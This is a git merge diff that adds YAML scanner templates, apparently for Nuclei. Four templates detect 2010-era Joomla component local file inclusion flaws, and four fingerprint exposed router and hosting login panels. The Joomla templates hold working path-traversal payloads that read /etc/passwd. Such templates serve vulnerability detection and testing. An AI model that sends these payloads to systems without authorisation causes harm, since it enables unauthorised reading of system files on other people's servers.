Merge remote-tracking branch 'origin' into dynamic_attributes

cves/2010/CVE-2010-1471.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-1471
+
+info:
+  name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/12170
+    - https://www.cvedetails.com/cve/CVE-2010-1471
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2010/CVE-2010-1601.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-1601
+
+info:
+  name: Joomla! Component JA Comment - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/12236
+    - https://www.cvedetails.com/cve/CVE-2010-1601
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2010/CVE-2010-1659.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-1659
+
+info:
+  name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/12426
+    - https://www.cvedetails.com/cve/CVE-2010-1659
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2010/CVE-2010-1714.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-1714
+
+info:
+  name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/12168
+    - https://www.cvedetails.com/cve/CVE-2010-1714
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

exposed-panels/3g-wireless-gateway.yaml

@@ -0,0 +1,25 @@
+id: 3g-wireless-gateway
+info:
+  name: 3G wireless gateway
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7050
+  tags: panel,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/htmlcode/html/indexdefault.asp"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "g_i3gState"
+          - "g_sysinfo_sim_state"
+          - "g_iUID"
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposed-panels/hitron-technologies.yaml

@@ -0,0 +1,24 @@
+id: hitron-technologies-detect
+info:
+  name: Hitron Technologies
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7062
+  tags: router,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "hitron"
+          - "$.hitron.languages.lang_init();"
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposed-panels/r-webserver-login.yaml

@@ -0,0 +1,22 @@
+id: r-webserver-login
+info:
+  name: R WebServer Login
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7132
+  tags: panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>R WebServer</title>"
+
+      - type: status
+        status:
+          - 200

exposed-panels/whm-login-detect.yaml

@@ -0,0 +1,22 @@
+id: whm-login-detect
+info:
+  name: WHM Login Detect
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7128
+  tags: whm,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>WHM Login</title>"
+
+      - type: status
+        status:
+          - 200